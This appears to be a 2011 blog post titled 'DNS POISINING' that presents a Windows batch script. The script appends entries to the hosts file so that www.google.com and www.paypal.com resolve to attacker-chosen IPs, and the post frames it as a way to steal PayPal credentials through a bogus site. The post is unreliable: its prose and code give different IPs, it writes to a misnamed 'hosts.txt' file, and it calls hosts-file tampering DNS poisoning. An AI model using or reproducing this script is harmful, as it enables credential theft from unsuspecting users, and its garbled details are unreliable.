Friday, April 1, 2011

DNS POISINING



This program creates a new entry in the hosts file, so that whenever an user attempts to move to
www.google.com, he will be re-directed to another host that has the IP address of 110.224.53.172, likewise if the user attempts to login to the paypal account by typing in www.paypal.com, he will be re-directed to another external bogus website that has the IP address of 10.199.64.67, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes.

@echo off
echo 110.224.53.172 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 110.224.53.172 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Affiliate Network Reviews